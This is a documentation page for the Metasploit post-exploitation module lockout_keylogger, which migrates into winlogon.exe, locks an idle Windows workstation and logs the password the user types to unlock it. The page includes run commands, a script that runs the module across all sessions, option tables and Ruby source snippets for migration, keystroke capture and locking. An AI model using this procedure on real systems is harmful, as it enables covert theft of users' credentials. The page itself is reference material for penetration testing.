Windows Capture Winlogon Lockout Credential Keylogger - Metasploit
This page contains detailed information about how to use the post/windows/capture/lockout_keylogger metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Source code: modules/post/windows/capture/lockout_keylogger.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe using idle time and natural system changes to give a false sense of security to the user.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/capture/lockout_keylogger
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/capture/lockout_keylogger
msf post(lockout_keylogger) > show options
... show and set options ...
msf post(lockout_keylogger) > set SESSION session-id
msf post(lockout_keylogger) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/capture/lockout_keylogger")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Go back to menu.
Msfconsole Usage
Here is how the windows/capture/lockout_keylogger post exploitation module looks in the msfconsole:
msf6 > use post/windows/capture/lockout_keylogger
msf6 post(windows/capture/lockout_keylogger) > show info
Name: Windows Capture Winlogon Lockout Credential Keylogger
Module: post/windows/capture/lockout_keylogger
Platform: Windows
Arch:
Rank: Normal
Provided by:
mubix <[email protected]>
cg
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEARTBEAT 30 yes Heart beat between idle checks
INTERVAL 30 yes Time between key collection during logging
LOCKTIME 300 yes Amount of idle time before lockout
PID no Target PID, only needed if multiple winlogon.exe instances exist
SESSION yes The session to run this module on.
WAIT false yes Wait for lockout instead of default method
Description:
This module migrates and logs Microsoft Windows user's passwords via
Winlogon.exe using idle time and natural system changes to give a
false sense of security to the user.
References:
http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html
Module Options
This is a complete list of options available in the windows/capture/lockout_keylogger post exploitation module:
msf6 post(windows/capture/lockout_keylogger) > show options
Module options (post/windows/capture/lockout_keylogger):
Name Current Setting Required Description
---- --------------- -------- -----------
HEARTBEAT 30 yes Heart beat between idle checks
INTERVAL 30 yes Time between key collection during logging
LOCKTIME 300 yes Amount of idle time before lockout
PID no Target PID, only needed if multiple winlogon.exe instances exist
SESSION yes The session to run this module on.
WAIT false yes Wait for lockout instead of default method
Advanced Options
Here is a complete list of advanced options supported by the windows/capture/lockout_keylogger post exploitation module:
msf6 post(windows/capture/lockout_keylogger) > show advanced
Module advanced options (post/windows/capture/lockout_keylogger):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/capture/lockout_keylogger module can do:
msf6 post(windows/capture/lockout_keylogger) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/capture/lockout_keylogger post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/capture/lockout_keylogger) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Winlogon not found! Exiting
- Multiple WINLOGON processes found, run manually and specify pid
- Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session
- Failed to start Keylogging!
- This module does not support this platform.
- Must be an admin to migrate into Winlogon.exe, exiting
- Already in WINLOGON no need to migrate
- Unable to migrate, try getsystem first
- Locking the workstation falied, trying again..
- The system will not lock this session, nor will it be used for user login, exiting...
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Winlogon not found! Exiting
Here is a relevant code snippet related to the "Winlogon not found! Exiting" error message:
46: if x['name'].downcase == "winlogon.exe"
47: winlogon << x
48: end
49: end
50: if winlogon.size == 0
51: print_status("Winlogon not found! Exiting")
52: return 'exit'
53: elsif winlogon.size == 1
54: return winlogon[0]['pid']
55: else
56: print_error("Multiple WINLOGON processes found, run manually and specify pid")
Multiple WINLOGON processes found, run manually and specify pid
Here is a relevant code snippet related to the "Multiple WINLOGON processes found, run manually and specify pid" error message:
51: print_status("Winlogon not found! Exiting")
52: return 'exit'
53: elsif winlogon.size == 1
54: return winlogon[0]['pid']
55: else
56: print_error("Multiple WINLOGON processes found, run manually and specify pid")
57: print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58: winlogon.each do |tp|
59: print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60: end
61: return 'exit'
Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session
Here is a relevant code snippet related to the "Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session" error message:
52: return 'exit'
53: elsif winlogon.size == 1
54: return winlogon[0]['pid']
55: else
56: print_error("Multiple WINLOGON processes found, run manually and specify pid")
57: print_error("Be wise. XP / VISTA / 7 use session 0 - 2k3/2k8 use RDP session")
58: winlogon.each do |tp|
59: print_status("Winlogon.exe - PID: #{tp['pid']} - Session: #{tp['session']}")
60: end
61: return 'exit'
62: end
Failed to start Keylogging!
Here is a relevant code snippet related to the "Failed to start Keylogging!" error message:
67: begin
68: print_status("Starting the keystroke sniffer...")
69: session.ui.keyscan_start
70: return true
71: rescue
72: print_error("Failed to start Keylogging!")
73: return false
74: end
75: end
76:
77: # Function for Collecting Capture (pulled from Carlos Perez's Keylogrecorder)
This module does not support this platform.
Here is a relevant code snippet related to the "This module does not support this platform." error message:
151: ::FileUtils.mkdir_p(logs) # Create the log directory
152: logfile = logs + ::File::Separator + host + filenameinfo + ".txt" # Logfile name
153:
154: # Make sure we are on a Windows host
155: if client.platform != 'windows'
156: print_error('This module does not support this platform.')
157: return
158: end
159:
160: # Check admin status
161: admin = check_admin
Must be an admin to migrate into Winlogon.exe, exiting
Here is a relevant code snippet related to the "Must be an admin to migrate into Winlogon.exe, exiting" error message:
158: end
159:
160: # Check admin status
161: admin = check_admin
162: if admin == false
163: print_error("Must be an admin to migrate into Winlogon.exe, exiting")
164: return
165: end
166:
167: mypid = session.sys.process.getpid
168: if datastore['PID'] == 0
Already in WINLOGON no need to migrate
Here is a relevant code snippet related to the "Already in WINLOGON no need to migrate" error message:
176: targetpid = datastore['PID']
177: print_status("WINLOGON PID:#{targetpid} specified. I'm trusting you...")
178: end
179:
180: if mypid == targetpid
181: print_status("Already in WINLOGON no need to migrate")
182: else
183: print_status("Migrating from PID:#{mypid}")
184: begin
185: session.core.migrate(targetpid)
186: rescue
Unable to migrate, try getsystem first
Here is a relevant code snippet related to the "Unable to migrate, try getsystem first" error message:
182: else
183: print_status("Migrating from PID:#{mypid}")
184: begin
185: session.core.migrate(targetpid)
186: rescue
187: print_error("Unable to migrate, try getsystem first")
188: return
189: end
190: print_good("Migrated to WINLOGON PID: #{targetpid} successfully")
191: end
192:
Locking the workstation falied, trying again..
Here is a relevant code snippet related to the "Locking the workstation falied, trying again.." error message:
222: select(nil, nil, nil, datastore['HEARTBEAT'])
223: currentidle = session.ui.idle_time
224: end
225: client.railgun.user32.LockWorkStation()
226: if client.railgun.user32.GetForegroundWindow()['return'] == 0
227: print_error("Locking the workstation falied, trying again..")
228: client.railgun.user32.LockWorkStation()
229: if client.railgun.user32.GetForegroundWindow()['return'] == 0
230: print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231: return
232: else
The system will not lock this session, nor will it be used for user login, exiting...
Here is a relevant code snippet related to the "The system will not lock this session, nor will it be used for user login, exiting..." error message:
225: client.railgun.user32.LockWorkStation()
226: if client.railgun.user32.GetForegroundWindow()['return'] == 0
227: print_error("Locking the workstation falied, trying again..")
228: client.railgun.user32.LockWorkStation()
229: if client.railgun.user32.GetForegroundWindow()['return'] == 0
230: print_error("The system will not lock this session, nor will it be used for user login, exiting...")
231: return
232: else
233: print_status("Locked this time, time to start keyloggin...")
234: end
235: end
Go back to menu.
Related Pull Requests
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #2525 Merged Pull Request: Change module boilerplate
- #2304 Merged Pull Request: Fix load order in posts, hopefully forever
- #2341 Merged Pull Request: Grammar fixes in descriptions
- #2313 Merged Pull Request: Correct module naming style
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
- #1110 Merged Pull Request: Fix instances of invalid lower-case datastore use
- #958 Merged Pull Request: Msftidy 2
- #952 Merged Pull Request: standardizing author info
References
See Also
Check also the following modules related to this module:
Authors
- mubix
- cg
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.